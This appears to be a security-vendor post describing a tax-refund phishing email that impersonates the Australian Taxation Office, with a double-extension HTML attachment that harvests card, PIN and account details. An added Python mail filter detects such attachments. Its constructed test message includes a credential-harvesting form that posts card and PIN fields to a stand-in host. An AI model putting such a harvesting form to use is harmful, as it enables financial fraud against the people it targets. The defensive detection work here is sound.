The Australian Taxation Office (ATO) is calling on people to start thinking about lodging their 2008 tax returns. With this significant event approaching, spammers are using it as bait for phishing emails.
The email contains a letter claiming to be from the ATO. It informs the recipient that he or she is eligible to receive a tax refund. It then asks the recipient to fill out the form attached to the email, click the PRINT button, and send it to the head office.
The attached form uses a double file extension, .PDF.HTM, to trick users into believing they are filling out a PDF file when it is really an HTML page.
Further study of the form's content reveals a section that asks for the recipient’s account information and states, “Please enter your account information where the 568.24 will be debited.” Note that, according to the email, the user is eligible for a tax refund. However, the spammers decided instead to fill in the field themselves.
Furthermore, the form asks for the user’s card number and PIN, which should be irrelevant if this is for a tax return.
Once the user completes the form and clicks the PRINT button, a window appears where the user can specify settings related to the printing process. It may look like a normal process, but while the document is being printed, the browser connects to a site and sends the entered details there.
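A mail filter can flag this pattern before the attachment reaches a user. The following is an added example, not code from the original post: it reports HTML attachments hiding behind a document-style extension and lists any remote form targets and sensitive input names inside them. It assumes the form submits through a plain `action` attribute (the post does not say how the data is sent), and the host `collector.example` and the field names are constructed.

```python
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

DECOY_EXTS = {"pdf", "doc", "xls", "txt"}   # what the name pretends to be
HTML_EXTS = {"htm", "html"}                 # what the browser actually opens
SENSITIVE = ("card", "pin", "account", "password")

class FormAudit(HTMLParser):
    """Record remote form targets and sensitive-looking input names."""
    def __init__(self):
        super().__init__()
        self.remote_actions, self.sensitive_fields = [], []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form" and urlparse(a.get("action", "")).scheme in ("http", "https"):
            self.remote_actions.append(a["action"])
        name = a.get("name", "").lower()
        if tag == "input" and (a.get("type", "").lower() == "password"
                               or any(s in name for s in SENSITIVE)):
            self.sensitive_fields.append(name)

def audit_message(msg):
    """Return one finding per attachment that is HTML behind a decoy extension."""
    findings = []
    for part in msg.iter_attachments():
        filename = part.get_filename() or ""
        exts = filename.lower().split(".")[1:]
        if len(exts) < 2 or exts[-1] not in HTML_EXTS or exts[-2] not in DECOY_EXTS:
            continue
        body = part.get_content()
        body = body.decode("utf-8", "replace") if isinstance(body, bytes) else body
        audit = FormAudit()
        audit.feed(body)
        findings.append({"filename": filename, "remote_actions": audit.remote_actions,
                         "sensitive_fields": audit.sensitive_fields})
    return findings

def sample_message():
    """Constructed sample modelled on the lure described above."""
    msg = EmailMessage()
    msg.set_content("Please complete the attached form.")
    msg.add_attachment(b"%PDF-1.4 constructed", maintype="application",
                       subtype="pdf", filename="receipt.pdf")
    msg.add_attachment('<form action="http://collector.example/submit">'
                       '<input name="card_number"><input name="PIN" type="password">'
                       '</form>', subtype="html", filename="refund_form.pdf.htm")
    return msg
```

To run it on a message read from disk, parse the file with `email.message_from_binary_file(fp, policy=email.policy.default)` so that `iter_attachments()` is available.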
Users should be aware that, not only now but especially in these times of crisis, criminals will never tire of making offers of money or other goods to mask their true intentions.
The Smart Protection Network blocks both the spam email and the phishing website.